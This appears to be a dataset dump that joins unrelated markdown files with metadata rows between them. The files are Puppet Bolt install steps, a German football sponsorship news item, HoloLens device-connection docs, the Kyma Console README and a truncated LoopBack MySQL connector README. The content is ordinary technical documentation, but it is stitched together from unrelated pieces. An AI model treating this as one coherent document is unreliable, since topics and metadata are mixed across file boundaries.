puppet-bolt ``` ### Windows installer (MSI) **Install Bolt** Use the Windows installer (MSI) package to install Bolt on Windows: 1. Download the [Bolt installer package](https://downloads.puppet.com/windows/puppet-tools/puppet-bolt-x64-latest.msi). 1. Double-click the MSI file and run the installer. 1. Install the [PuppetBolt PowerShell module](#puppetbolt-powershell-module). 1. Open a new PowerShell window and run a [Bolt cmdlet](bolt_cmdlet_reference.md). If you see an error message instead of the expected output, you might need to [add the Bolt module to PowerShell](troubleshooting.md#powershell-does-not-recognize-bolt-cmdlets) or [change execution policy restrictions](troubleshooting.md#powershell-could-not-load-the-bolt-powershell-module). **Upgrade Bolt** To upgrade Bolt to the latest version, download the MSI again and repeat the installation steps. **Uninstall Bolt** You can uninstall Bolt from Windows **Apps & Features**: 1. Press **Windows** + **X** + **F** to open **Apps & Features**. 1. Search for **Puppet Bolt**, select it, and click **Uninstall**. ### PuppetBolt PowerShell module The PuppetBolt PowerShell module is available on the [PowerShell Gallery](https://www.powershellgallery.com/packages/PuppetBolt) and includes help documents and [PowerShell cmdlets](bolt_cmdlet_reference.md) for running each of Bolt's commands. New versions of the PuppetBolt module are shipped at the same time as a new Bolt release. **Install PuppetBolt** To install the PuppetBolt PowerShell module, run the following command in PowerShell: ```powershell Install-Module PuppetBolt ``` **Update PuppetBolt** To update the PuppetBolt PowerShell module, run the following command in PowerShell: ```powershell Update-Module PuppetBolt ``` **Uninstall PuppetBolt** To uninstall the PuppetBolt PowerShell module, run the following command in PowerShell: ```powershell Remove-Module PuppetBolt ``` ## Install Bolt on RHEL **Install Bolt** To install Bolt, run the appropriate command for the version of RHEL you have installed: - _RHEL 6_ ```shell sudo rpm -Uvh https://yum.puppet.com/puppet-tools-release-el-6.noarch.rpm sudo yum install puppet-bolt ``` - _RHEL 7_ ```shell sudo rpm -Uvh https://yum.puppet.com/puppet-tools-release-el-7.noarch.rpm sudo yum install puppet-bolt ``` - _RHEL 8_ ```shell sudo rpm -Uvh https://yum.puppet.com/puppet-tools-release-el-8.noarch.rpm sudo yum install puppet-bolt ``` **Upgrade Bolt** To upgrade Bolt to the latest version, run the following command: ```shell sudo yum update puppet-bolt ``` **Uninstall Bolt** To uninstall Bolt, run the following command: ```shell sudo yum remove puppet-bolt ``` ## Install Bolt on SLES **Install Bolt** To install Bolt, run the appropriate command for the version of SLES you have installed: - _SLES 12_ ```shell sudo rpm -Uvh https://yum.puppet.com/puppet-tools-release-sles-12.noarch.rpm sudo zypper install puppet-bolt ``` **Upgrade Bolt** To upgrade Bolt to the latest version, run the following command: ```shell sudo zypper update puppet-bolt ``` **Uninstall Bolt** To uninstall Bolt, run the following command: ```shell sudo zypper remove puppet-bolt ``` ## Install Bolt on Ubuntu **Install Bolt** To install Bolt, run the appropriate command for the version of Ubuntu you have installed: - _Ubuntu 16.04_ ```shell wget https://apt.puppet.com/puppet-tools-release-xenial.deb sudo dpkg -i puppet-tools-release-xenial.deb sudo apt-get update sudo apt-get install puppet-bolt ``` - _Ubuntu 18.04_ ```shell wget https://apt.puppet.com/puppet-tools-release-bionic.deb sudo dpkg -i puppet-tools-release-bionic.deb sudo apt-get update sudo apt-get install puppet-bolt ``` - _Ubuntu 20.04_ ```shell wget https://apt.puppet.com/puppet-tools-release-focal.deb sudo dpkg -i puppet-tools-release-focal.deb sudo apt-get update sudo apt-get install puppet-bolt ``` **Upgrade Bolt** To upgrade Bolt to the latest version, run the following command: ```shell sudo apt-get update sudo apt install puppet-bolt ``` **Uninstall Bolt** To uninstall Bolt, run the following command: ```shell sudo apt remove puppet-bolt ``` ## Install Bolt as a gem To install Bolt reliably and with all dependencies, use one of the Bolt installation packages instead of a gem. Gem installations do not include core modules which are required for common Bolt actions. To install Bolt as a gem: ```shell gem install bolt ``` ## Install gems in Bolt's Ruby environment Bolt packages include their own copy of Ruby. When you install gems for use with Bolt, use the `--user-install` command-line option to avoid requiring privileged access for installation. This option also enables sharing gem content with Puppet installations — such as when running `apply` on `localhost` — that use the same Ruby version. To install a gem for use with Bolt, use the command appropriate to your operating system: - On Windows with the default install location: ``` "C:/Program Files/Puppet Labs/Bolt/bin/gem.bat" install --user-install <GEM> ``` - On other platforms: ``` /opt/puppetlabs/bolt/bin/gem install --user-install <GEM> ```
24.11674
145
0.715499
eng_Latn
0.833292
bb3f6cb3480fe0e9a95f47e29ea9fbbbc4f2c7e5
282
md
Markdown
_posts/2010/2010-04-29-fraport-bleibt-hauptsponsor.md
eintracht-stats/eintracht-stats.github.io
9d1cd3d82bff1b70106e3b5cf3c0da8f0d07bb43
[ "MIT" ]
null
null
null
_posts/2010/2010-04-29-fraport-bleibt-hauptsponsor.md
eintracht-stats/eintracht-stats.github.io
9d1cd3d82bff1b70106e3b5cf3c0da8f0d07bb43
[ "MIT" ]
1
2021-04-01T17:08:43.000Z
2021-04-01T17:08:43.000Z
_posts/2010/2010-04-29-fraport-bleibt-hauptsponsor.md
eintracht-stats/eintracht-stats.github.io
9d1cd3d82bff1b70106e3b5cf3c0da8f0d07bb43
[ "MIT" ]
null
null
null
--- layout: post title: "Fraport bleibt Hauptsponsor" --- Die Eintracht hat den Vertrag mit Hauptsponsor Fraport um ein weiteres Jahr verlängert. Die Gespräche mit anderen möglichen Partner (u.a. Seat) sind damit beendet. Über die Konditionen des Vertrags wurde nichts bekannt.
28.2
219
0.783688
deu_Latn
0.999744
bb400c93b9d344abcfe59efdfd359eaf5ae6e54b
5,697
md
Markdown
hololens/hololens-connect-devices.md
golish/Hololens
d99de8d5afbe2585fdb5396bd0165ac74734b281
[ "CC-BY-4.0", "MIT" ]
null
null
null
hololens/hololens-connect-devices.md
golish/Hololens
d99de8d5afbe2585fdb5396bd0165ac74734b281
[ "CC-BY-4.0", "MIT" ]
null
null
null
hololens/hololens-connect-devices.md
golish/Hololens
d99de8d5afbe2585fdb5396bd0165ac74734b281
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Connect to Bluetooth and USB-C devices description: Get started connecting to Bluetooth and USB-C devices and accessories from your HoloLens mixed reality devices. ms.assetid: 01af0848-3b36-4c13-b797-f38ad3977e30 ms.prod: hololens ms.sitesec: library author: Teresa-Motiv ms.author: v-tea ms.topic: article ms.localizationpriority: high ms.date: 03/11/2020 manager: jarrettr appliesto: - HoloLens (1st gen) - HoloLens 2 --- # Connect to Bluetooth and USB-C devices ## Pair Bluetooth devices HoloLens 2 supports the following classes of Bluetooth devices: - [HID](/windows-hardware/drivers/hid/): - Mouse - Keyboard - Audio output (A2DP) devices HoloLens 2 supports the following Bluetooth APIs: - GATT [Server](/windows/uwp/devices-sensors/gatt-server) and [Client](/windows/uwp/devices-sensors/gatt-client) - [RFCOMM](/windows/uwp/devices-sensors/send-or-receive-files-with-rfcomm) >[!IMPORTANT] > You may have to install corresponding companion apps from Microsoft Store to actually use the HID and GATT devices. HoloLens (1st gen) supports the following classes of Bluetooth devices: - Mouse - Keyboard - [HoloLens (1st gen) clicker](hololens1-clicker.md) > [!NOTE] > Other types of Bluetooth devices, such as speakers, headsets, smartphones, and game pads, may be listed as available in HoloLens settings. However, these devices aren't supported on HoloLens (1st gen). For more information, see [HoloLens Settings lists devices as available, but the devices don't work](hololens-troubleshooting.md#devices-listed-as-available-in-settings-dont-work). ### Pair a Bluetooth keyboard or mouse 1. Turn on your keyboard or mouse, and make it discoverable. To learn how to make the device discoverable, look for information on the device (or its documentation) or visit the manufacturer's website. 1. Use the bloom gesture (HoloLens (1st gen)) or the start gesture (HoloLens 2) to go to **Start**, and then select **Settings**. 1. Select **Devices**, and make sure that Bluetooth is on. 1. When you see the device name, select **Pair**, and then follow the instructions. ## Disable Bluetooth This procedure turns off the RF components of the Bluetooth radio and disables all Bluetooth functionality on Microsoft HoloLens. 1. Use the bloom gesture (HoloLens (1st gen)) or the start gesture (HoloLens 2) to go to **Start**, and then select **Settings** > **Devices**. 1. Move the slider switch for **Bluetooth** to the **Off** position. ## HoloLens 2: Connect USB-C devices HoloLens 2 supports the following classes of USB-C devices: - Mass storage devices (such as thumb drives) - Ethernet adapters (including ethernet plus charging) - USB-C-to-3.5mm digital audio adapters - USB-C digital audio headsets (including headset adapters plus charging) - USB-C External Microphones ([Windows Holographic, version 21H1](hololens-release-notes.md#windows-holographic-version-21h1) and higher) - Wired mouse - Wired keyboard - Combination PD hubs (USB A plus PD charging) > [!NOTE] > In response to customer feedback, we have enabled limited support for cellular connectivity tethered directly to the HoloLens via USB-C. See [Connect to Cellular and 5G](hololens-cellular.md) for more information. ### USB-C External Microphone Support > [!IMPORTANT] > Plugging in **a USB mic will not automatically set it as the input device**. When plugging in a set of USB-C headphones, users will observe that the headphone's audio will automatically be redirected to the headphones, but the HoloLens OS prioritizes the internal microphone array above any other input device. **In order to use a USB-C microphone follow the steps below.** > [!NOTE] > External microphones cannot be used in builds prior to [Windows Holographic, version 21H1](hololens-release-notes.md#windows-holographic-version-21h1) and higher. Users can select USB-C connected external microphones using the **Sound** settings panel. USB-C microphones can be used for calling, recording, etc. Open the **Settings** app and select **System** > **Sound**. ![Sound Settings](images/usbc-mic-1.jpg) > [!IMPORTANT] > To use external microphones with **Remote Assist**, users will need to click the “Manage sound devices” hyperlink. > > Then use the drop-down to set the external microphone as either **Default** or **Communications Default.** Choosing **Default** means that the external microphone will be used everywhere. > > Choosing **Communications Default** means that the external microphone will be used in Remote Assist and other communications apps, but the HoloLens mic array may still be used for other tasks. ![Manage sound devices](images/usbc-mic-2.png) <br> ![Set microphone default](images/usbc-mic-3.jpg) #### What about Bluetooth microphone support? Unfortunately, Bluetooth microphones are still not currently supported on HoloLens 2. ### USB-C Hubs Some users may need to connect multiple devices at once. For users who would like to use a [USB-C microphone](#usb-c-external-microphone-support) along with another connected device, USB-C hubs may fit the customer's need. Microsoft has not tested these devices, nor can we recommend any specific brands. **Requirements for USB-C hub and connected devices:** - Connected devices must not require a driver to be installed. - The total power draw of all connected devices must be below 4.5 Watts. ## Connect to Miracast To use Miracast, follow these steps: 1. Do one of the following: - Open the **Start** menu, and select the **Display** icon. - Say "Connect" while you gaze at the **Start** menu. 1. On the list of devices that appears, select an available device. 1. Complete the pairing to begin projecting.
43.48855
384
0.764262
eng_Latn
0.984405
bb4096cfa48863a25f2f339ac1a9ef7635554ed3
8,951
md
Markdown
README.md
akucharska/busola
8e4a7c139920d5456d37ca08e363270cfc7ec977
[ "Apache-2.0" ]
null
null
null
README.md
akucharska/busola
8e4a7c139920d5456d37ca08e363270cfc7ec977
[ "Apache-2.0" ]
null
null
null
README.md
akucharska/busola
8e4a7c139920d5456d37ca08e363270cfc7ec977
[ "Apache-2.0" ]
null
null
null
# Console ## Overview Console is a web-based UI for managing resources within Kyma. It consists of separate frontend applications. Each project is responsible for providing a user interface for particular resource management. ### Components The Console project consists of the following UI projects: - [`Core`](./core) - The main frame of Kyma UI - [`Service-Catalog-UI`](./service-catalog-ui) - The UI layer for Service Catalog, Instances and Brokers - [`Addons`](./add-ons) - The view for displaying Namespace-scoped and cluster-wide Addons - [`Log UI`](./logging) - The logs view - [`Tests`](./tests) - Acceptance and end-to-end tests The Console also includes React and Angular libraries: - [`React common`](./common) - common functionalities for React applications - [`React components`](./components/react) - components for React applications (it will be replaced by `Shared components`) - [`Shared components`](./components/shared) - new versions of components for React applications written in TypeScript - [`Generic documentation`](./components/generic-documentation) - a React component that uses [`@kyma-project/documentation-component`](https://github.com/kyma-incubator/documentation-component) for displaying documentation and various specifications in the [`Service-Catalog-UI`](./service-catalog-ui) view. ## Prerequisites - [`npm`](https://www.npmjs.com/): >= 6.4.0 - [`node`](https://nodejs.org/en/): >= 12.0.0 ## Installation 1. Install [Kyma](https://kyma-project.io/docs/master/root/kyma/#installation-install-kyma-locally) as a backing service for your local instance of Console. Make sure you import certificates into your operating system and mark them as trusted. Otherwise, you cannot access the applications hosted in the `kyma.local` domain. 2. Install Console dependencies. To install dependencies for the root and all UI projects, and prepare symlinks for local libraries within this repository, run the following command: ```bash npm run bootstrap ``` > **NOTE:** The `npm run bootstrap` command: > > - installs root dependencies provided in the [package.json](./package.json) file > - installs dependencies for the [`React common`](./common), [`React components`](./components/react), [`Shared components`](./components/shared) and [`Generic documentation`](./components/generic-documentation) libraries > - builds all the libraries > - installs dependencies for all the [components](#components) > - updates your `/etc/hosts` with the `127.0.0.1 console-dev.kyma.local` host > - creates the `.clusterConfig.gen` file if it doesn't exist, pointing at the `kyma.local` domain ## Usage ### Set the cluster (optional) By default, the Kyma cluster URL with which the Console communicates is set to `kyma.local`. To change the address of the cluster, run: ```bash ./scripts/.setClusterConfig {CLUSTER_URL} ``` To simplify switching clusters hosted on the same domain, you can assign the domain to `CLUSTER_HOST` environment variable, then use any subdomain as a cluster name. For example, let's assume you want to easily switch between two clusters - `foo.abc.com` and `bar.abc.com`. Follow these steps to simplify switching between these clusters: ```bash export CLUSTER_HOST=abc.com # If you use only one domain for your cluster, consider setting it permanently in your shell. ./scripts/.setClusterConfig foo # After setting the CLUSTER_HOST variable this is equal to running ./scripts/.setClusterConfig foo.abc.com ./scripts/.setClusterConfig bar # Switch to a different cluster on the same domain ``` To reset the domain to the default kyma.local setting, run: ```bash ./scripts/.setClusterConfig local ``` ### Start all views Use the following command to run the Console with the [`core`](./core) and all other views locally: ```bash npm run start ``` To get the credentials required to access the local instance of the Kyma Console at `http://console-dev.kyma.local:4200`, follow the instructions from [this](https://kyma-project.io/docs/master/root/kyma#installation-install-kyma-on-a-cluster-access-the-cluster) document. ### Watch changes in React libraries If you want to watch changes in the React libraries, run this command in a new terminal window: ```bash npm run watch:libraries ``` ## Development Once you start Kyma with Console locally, you can start development. All modules have hot-reload enabled therefore you can edit the code real time and see the changes in your browser. The `Core` and other UIs run at the following addresses: - `Core` - [http://console-dev.kyma.local:4200](http://console-dev.kyma.local:4200) - `Log UI` - [http://console-dev.kyma.local:4400](http://console-dev.kyma.local:4400) - `Catalog` - [http://console-dev.kyma.local:8000](http://console-dev.kyma.local:8000) - `Instances` - [http://console-dev.kyma.local:8001](http://console-dev.kyma.local:8001) - `Brokers` - [http://console-dev.kyma.local:8002](http://console-dev.kyma.local:8002) - `Addons` - [http://console-dev.kyma.local:8004](http://console-dev.kyma.local:8004) If you want to run only a specific UI, follow the instructions in the appropriate folder. ### Development with local GraphQL API By default, the [`core`](./core) view and all other views are connected to the **GraphQL API** running on the cluster at the `https://console-backend.{CLUSTER_DOMAIN}/graphql` address. If you want to use the local **GraphQL API** endpoint, follow the instructions in the **Run a local version** section of [this](https://github.com/kyma-project/kyma/tree/master/components/console-backend-service#run-a-local-version) document and run this command: ```bash npm run start:api ``` ### Security countermeasures When developing new features in Console UI, adhere to the following rules. This will help you to mitigate any security-related threats. #### Prevent Cross-site request forgery (XSRF) - Do not store the authentication token as a cookie. Make sure the token is sent to the Console Backend Service as a bearer token. - Make sure that state-changing operations (gql mutations) are only triggered upon explicit user interactions such as form submissions. - Keep in mind that UI rendering in response to user navigating between views is only allowed to trigger read-only operations (gql queries and subscriptions) without any data mutations. #### Protect against Cross-site scripting (XSS) - It is recommended to use JS frameworks that have built-in XSS prevention mechanisms, such as [reactJS](https://reactjs.org/docs/introducing-jsx.html#jsx-prevents-injection-attacks), [vue.js](https://vuejs.org/v2/guide/security.html#What-Vue-Does-to-Protect-You) or [angular](https://angular.io/guide/security#angulars-cross-site-scripting-security-model). - As a rule of thumb, you cannot perceive user input to be 100% safe. Get familiar with prevention mechanisms included in the framework of your choice. Make sure the user input is sanitized before it is embedded in the DOM tree. - Get familiar with the most common [XSS bypasses and potential dangers](https://stackoverflow.com/questions/33644499/what-does-it-mean-when-they-say-react-is-xss-protected). Keep them in mind when writing or reviewing the code. - Enable the `Content-security-policy` header for all new micro frontends to ensure in-depth XSS prevention. Do not allow for `unsafe-eval` policy. ### Run tests For the information on how to run tests and configure them, go to the [`tests`](tests) directory. ## Troubleshooting > **TIP:** To solve most of the problems with the Console development, clear the browser cache or do a hard refresh of the website. ### CI fails on PRs related to staging dependencies Remove the `node_modules` folder and the `package-lock.json` file in all libraries in the [`components`](./components) folder and on the root. Then rerun the `npm run bootstrap` command in the root context and push all the changes. ### Can't access `console.kyma.local` and `console-dev.kyma.local:4200` after hibernating the Minikube cluster Follow the guidelines from [this](https://kyma-project.io/docs/#troubleshooting-basic-troubleshooting-can-t-log-in-to-the-console-after-hibernating-the-minikube-cluster) document to solve the problem. ### Check the availability of a remote cluster Use the `checkClusterAvailability.sh` script to quickly check the availability of remote clusters. ```bash ./scripts/checkClusterAvailability.sh {CLUSTER_URL} # or export CLUSTER_HOST=abc.com ./scripts/checkClusterAvailability.sh {cluster_subdomain} # the same as ./scripts/checkClusterAvailability.sh {CLUSTER_SUBDOMAIN}.abc.com # or ./scripts/checkClusterAvailability.sh # Checks the availability of every cluster that has ever been set through setClusterConfig.sh # or checked with checkClusterAvailability.sh on your machine. # or ./scripts/checkClusterAvailability.sh -s {cluster_domain} # Returns an appropriate exit code if the cluster is unavailable. ```
50.570621
448
0.762708
eng_Latn
0.966808
bb40e7f74b8ee0e87ffa9fd2052ee5b23ba7e0f2
65
md
Markdown
_partials/arm/Anka Virtualization/show/name/label/_index.md
veertuinc/anka-docs
90c10feb7fdd31b024a7ea49850c603cb6ea9b56
[ "BSD-2-Clause" ]
1
2021-11-08T00:55:45.000Z
2021-11-08T00:55:45.000Z
_partials/arm/Anka Virtualization/show/name/label/_index.md
veertuinc/anka-docs
90c10feb7fdd31b024a7ea49850c603cb6ea9b56
[ "BSD-2-Clause" ]
1
2022-03-11T02:56:35.000Z
2022-03-11T13:11:21.000Z
_partials/arm/Anka Virtualization/show/name/label/_index.md
veertuinc/anka-docs
90c10feb7fdd31b024a7ea49850c603cb6ea9b56
[ "BSD-2-Clause" ]
1
2022-02-15T13:57:04.000Z
2022-02-15T13:57:04.000Z
```shell > anka show name label --help anka: name: not found ```
13
29
0.646154
eng_Latn
0.994349
bb41162f6ff3b842d7367c517d88af18b0af6b83
1,683
md
Markdown
includes/vpn-gateway-vnet-vnet-faq-include.md
OpenLocalizationTestOrg/azure-docs-pr15_pl-PL
18fa7535e7cdf4b159e63a40776995fa95f1f314
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
includes/vpn-gateway-vnet-vnet-faq-include.md
OpenLocalizationTestOrg/azure-docs-pr15_pl-PL
18fa7535e7cdf4b159e63a40776995fa95f1f314
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
includes/vpn-gateway-vnet-vnet-faq-include.md
OpenLocalizationTestOrg/azure-docs-pr15_pl-PL
18fa7535e7cdf4b159e63a40776995fa95f1f314
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
- Wirtualnych sieci może być w regionach Azure takich samych lub różnych (lokalizacja). - Usługi w chmurze lub punkt końcowy równoważenia obciążenia nie może obejmować wielu wirtualnych sieci, nawet jeśli są połączone. - Łączenie wielu sieci wirtualnej Azure nie wymaga bram VPN lokalnego, chyba że jest wymagana łączność między lokalnej. - VNet-VNet obsługuje łączenia wirtualnej sieci. Nie obsługuje łączenia maszyn wirtualnych lub nie w wirtualnej sieci usługi w chmurze. - VNet do VNet wymaga bram Azure VPN z RouteBased (wcześniej nazywane Routing dynamiczny) rodzaje sieci VPN. - Połączenia wirtualnej sieci można używać jednocześnie z wielu witryn sieci VPN z maksymalnie 10 (domyślnego, standardowego bramy) lub 30 (wysokiej wydajności bramy) VPN tuneluje wirtualnej sieci VPN bramy nawiązywanie połączeń z innymi wirtualnych sieci lokalnej witryny. - Nie musisz zachodzi obszary adresów wirtualnych sieci i lokalnych witryn sieci lokalnej. Nakładające się spacje adres spowoduje, że VNet do VNet połączenia kończy się niepowodzeniem. - Zbędne tunele między dwoma wirtualnych sieci nie są obsługiwane. - Wszystkie tuneli VPN wirtualnej sieci udostępnianie dostępna przepustowość brama Azure VPN i tym samym przestoje Brama VPN SLA platformy Azure. - Ruch VNet do VNet przesyłania w witrynie Microsoft Network nie Internet. - Ruch VNet do VNet w ramach tego samego regionu jest bezpłatna dla obu kierunków; krzyżowe region VNet do VNet wyjściowym ruch jest pobierana z szybkości przesyłania danych między VNet wychodzącego według regionów źródła. Zajrzyj do [ceny strony](https://azure.microsoft.com/pricing/details/vpn-gateway/) Aby uzyskać szczegółowe informacje.
80.142857
341
0.823529
pol_Latn
0.999992
bb411de551d30411d61acbf848677f7750910fac
14,801
md
Markdown
pages/en/lb3/readmes/loopback-connector-mysql.md
kestrel97/loopback.io
1d4303065392b404c443e443aa6265f76c04efe3
[ "MIT" ]
4
2019-04-19T06:34:38.000Z
2020-11-04T13:06:30.000Z
pages/en/lb3/readmes/loopback-connector-mysql.md
kestrel97/loopback.io
1d4303065392b404c443e443aa6265f76c04efe3
[ "MIT" ]
7
2020-07-16T23:02:36.000Z
2022-01-22T04:32:43.000Z
pages/en/lb3/readmes/loopback-connector-mysql.md
kestrel97/loopback.io
1d4303065392b404c443e443aa6265f76c04efe3
[ "MIT" ]
null
null
null
# loopback-connector-mysql [MySQL](https://www.mysql.com/) is a popular open-source relational database management system (RDBMS). The `loopback-connector-mysql` module provides the MySQL connector module for the LoopBack framework. <div class="gh-only">See also <a href="http://loopback.io/doc/en/lb3/MySQL-connector.html">LoopBack MySQL Connector</a> in LoopBack documentation. <br/><br/> <b>NOTE</b>: The MySQL connector requires MySQL 5.0+. </div> ## Installation In your application root directory, enter this command to install the connector: ```sh npm install loopback-connector-mysql --save ``` This installs the module from npm and adds it as a dependency to the application's `package.json` file. If you create a MySQL data source using the data source generator as described below, you don't have to do this, since the generator will run `npm install` for you. ## Creating a MySQL data source Use the [Data source generator](http://loopback.io/doc/en/lb3/Data-source-generator.html) to add a MySQL data source to your application. The generator will prompt for the database server hostname, port, and other settings required to connect to a MySQL database. It will also run the `npm install` command above for you. The entry in the application's `/server/datasources.json` will look like this: ```javascript "mydb": { "name": "mydb", "connector": "mysql", "host": "myserver", "port": 3306, "database": "mydb", "password": "mypassword", "user": "admin" } ``` Edit `datasources.json` to add any other additional properties that you require. ### Properties <table> <thead> <tr> <th width="150">Property</th> <th width="80">Type</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>collation</td> <td>String</td> <td>Determines the charset for the connection. Default is utf8_general_ci.</td> </tr> <tr> <td>connector</td> <td>String</td> <td>Connector name, either “loopback-connector-mysql” or “mysql”.</td> </tr> <tr> <td>connectionLimit</td> <td>Number</td> <td>The maximum number of connections to create at once. Default is 10.</td> </tr> <tr> <td>database</td> <td>String</td> <td>Database name</td> </tr> <tr> <td>debug</td> <td>Boolean</td> <td>If true, turn on verbose mode to debug database queries and lifecycle.</td> </tr> <tr> <td>host</td> <td>String</td> <td>Database host name</td> </tr> <tr> <td>password</td> <td>String</td> <td>Password to connect to database</td> </tr> <tr> <td>port</td> <td>Number</td> <td>Database TCP port</td> </tr> <tr> <td>socketPath</td> <td>String</td> <td>The path to a unix domain socket to connect to. When used host and port are ignored.</td> </tr> <tr> <td>supportBigNumbers</td> <td>Boolean</td> <td>Enable this option to deal with big numbers (BIGINT and DECIMAL columns) in the database. Default is false.</td> </tr> <tr> <td>timeZone</td> <td>String</td> <td>The timezone used to store local dates. Default is ‘local’.</td> </tr> <tr> <td>url</td> <td>String</td> <td>Connection URL of form <code>mysql://user:password@host/db</code>. Overrides other connection settings.</td> </tr> <tr> <td>username</td> <td>String</td> <td>Username to connect to database</td> </tr> </tbody> </table> **NOTE**: In addition to these properties, you can use additional parameters supported by [`node-mysql`](https://github.com/felixge/node-mysql). ## Type mappings See [LoopBack types](http://loopback.io/doc/en/lb3/LoopBack-types.html) for details on LoopBack's data types. ### LoopBack to MySQL types <table> <thead> <tr> <th>LoopBack Type</th> <th>MySQL Type</th> </tr> </thead> <tbody> <tr> <td>String/JSON</td> <td>VARCHAR</td> </tr> <tr> <td>Text</td> <td>TEXT</td> </tr> <tr> <td>Number</td> <td>INT</td> </tr> <tr> <td>Date</td> <td>DATETIME</td> </tr> <tr> <td>Boolean</td> <td>TINYINT(1)</td> </tr> <tr> <td><a href="http://apidocs.strongloop.com/loopback-datasource-juggler/#geopoint" class="external-link">GeoPoint</a> object</td> <td>POINT</td> </tr> <tr> <td>Custom Enum type<br>(See <a href="#enum">Enum</a> below)</td> <td>ENUM</td> </tr> </tbody> </table> ### MySQL to LoopBack types <table> <tbody> <tr> <th>MySQL Type</th> <th>LoopBack Type</th> </tr> <tr> <td>CHAR</td> <td>String</td> </tr> <tr> <td>BIT(1)<br>CHAR(1)<br>TINYINT(1)</td> <td>Boolean</td> </tr> <tr> <td>VARCHAR<br>TINYTEXT<br>MEDIUMTEXT<br>LONGTEXT<br>TEXT<br>ENUM<br>SET</td> <td>String</td> </tr> <tr> <td>TINYBLOB<br>MEDIUMBLOB<br>LONGBLOB<br>BLOB<br>BINARY<br>VARBINARY<br>BIT</td> <td>Node.js <a href="http://nodejs.org/api/buffer.html">Buffer object</a></td> </tr> <tr> <td>TINYINT<br>SMALLINT<br>INT<br>MEDIUMINT<br>YEAR<br>FLOAT<br>DOUBLE<br>NUMERIC<br>DECIMAL</td> <td> <p>Number<br>For FLOAT and DOUBLE, see <a href="#floating-point-types">Floating-point types</a>. </p> <p>For NUMERIC and DECIMAL, see <a href="MySQL-connector.html">Fixed-point exact value types</a></p> </td> </tr> <tr> <td>DATE<br>TIMESTAMP<br>DATETIME</td> <td>Date</td> </tr> </tbody> </table> *NOTE* as of v3.0.0 of MySQL Connector, the following flags were introduced: * `treatCHAR1AsString` default `false` - treats CHAR(1) as a String instead of a Boolean * `treatBIT1AsBit` default `true` - treats BIT(1) as a Boolean instead of a Binary * `treatTINYINT1AsTinyInt` default `true` - treats TINYINT(1) as a Boolean instead of a Number ## Using the datatype field/column option with MySQL Use the `mysql` model property to specify additional MySQL-specific properties for a LoopBack model. For example: {% include code-caption.html content="/common/models/model.json" %} ```javascript "locationId":{ "type":"String", "required":true, "length":20, "mysql": { "columnName":"LOCATION_ID", "dataType":"VARCHAR", "dataLength":20, "nullable":"N" } } ``` You can also use the dataType column/property attribute to specify what MySQL column type to use for many loopback-datasource-juggler types.  The following type-dataType combinations are supported: * Number * integer * tinyint * smallint * mediumint * int * bigint Use the `limit` option to alter the display width. Example: ```javascript { userName : { type: String, dataType: 'char', limit: 24 } } ``` ### Default Clause/Constant Use the `default` property to have MySQL handle setting column `DEFAULT` value. ```javascript "status": { "type": "string", "mysql": { "default": "pending" } }, "number": { "type": "number", "mysql": { "default": 256 } } ``` For the date or timestamp types use `CURRENT_TIMESTAMP` or `now`: ```javascript "last_modified": { "type": "date", "mysql": { "default":"CURRENT_TIMESTAMP" } } ``` **NOTE**: The following column types do **NOT** supported [MySQL Default Values](https://dev.mysql.com/doc/refman/5.7/en/data-type-defaults.html): - BLOB - TEXT - GEOMETRY - JSON ### Floating-point types For Float and Double data types, use the `precision` and `scale` options to specify custom precision. Default is (16,8). For example: ```javascript { average : { type: Number, dataType: 'float', precision: 20, scale: 4 } } ``` ### Fixed-point exact value types For Decimal and Numeric types, use the `precision` and `scale` options to specify custom precision. Default is (9,2). These aren't likely to function as true fixed-point. Example: ```javascript { stdDev : { type: Number, dataType: 'decimal', precision: 12, scale: 8 } } ``` ### Other types Convert String / DataSource.Text / DataSource.JSON to the following MySQL types: * varchar * char * text * mediumtext * tinytext * longtext Example:  ```javascript { userName : { type: String, dataType: 'char', limit: 24 } } ``` Example:  ```javascript { biography : { type: String, dataType: 'longtext' } } ``` Convert JSON Date types to  datetime or timestamp Example:  ```javascript { startTime : { type: Date, dataType: 'timestamp' } } ``` ### Enum Enums are special. Create an Enum using Enum factory: ```javascript var MOOD = dataSource.EnumFactory('glad', 'sad', 'mad');  MOOD.SAD; // 'sad'  MOOD(2); // 'sad'  MOOD('SAD'); // 'sad'  MOOD('sad'); // 'sad' { mood: { type: MOOD }} { choice: { type: dataSource.EnumFactory('yes', 'no', 'maybe'), null: false }} ``` ## Discovery and auto-migration ### Model discovery The MySQL connector supports _model discovery_ that enables you to create LoopBack models based on an existing database schema using the unified [database discovery API](http://apidocs.strongloop.com/loopback-datasource-juggler/#datasource-prototype-discoverandbuildmodels). For more information on discovery, see [Discovering models from relational databases](https://loopback.io/doc/en/lb3/Discovering-models-from-relational-databases.html). ### Auto-migration The MySQL connector also supports _auto-migration_ that enables you to create a database schema from LoopBack models using the [LoopBack automigrate method](http://apidocs.strongloop.com/loopback-datasource-juggler/#datasource-prototype-automigrate). For more information on auto-migration, see [Creating a database schema from models](https://loopback.io/doc/en/lb3/Creating-a-database-schema-from-models.html) for more information. #### Auto-migrate/Auto-update models with foreign keys MySQL handles the foreign key integrity of the related models upon auto-migrate or auto-update operation. It first deletes any related models before calling delete on the models with the relationship. Example: **model-definiton.json** ```json { "name": "Book", "base": "PersistedModel", "idInjection": false, "properties": { "bId": { "type": "number", "id": true, "required": true }, "name": { "type": "string" }, "isbn": { "type": "string" } }, "validations": [], "relations": { "author": { "type": "belongsTo", "model": "Author", "foreignKey": "authorId" } }, "acls": [], "methods": {}, "foreignKeys": { "authorId": { "name": "authorId", "foreignKey": "authorId", "entityKey": "aId", "entity": "Author" } } } ``` ```json { "name": "Author", "base": "PersistedModel", "idInjection": false, "properties": { "aId": { "type": "number", "id": true, "required": true }, "name": { "type": "string" }, "dob": { "type": "date" } }, "validations": [], "relations": {}, "acls": [], "methods": {} } ``` **boot-script.js** ```js module.exports = function(app) { var mysqlDs = app.dataSources.mysqlDS; var Book = app.models.Book; var Author = app.models.Author; // first autoupdate the `Author` model to avoid foreign key constraint failure mysqlDs.autoupdate('Author', function(err) { if (err) throw err; console.log('\nAutoupdated table `Author`.'); mysqlDs.autoupdate('Book', function(err) { if (err) throw err; console.log('\nAutoupdated table `Book`.'); // at this point the database table 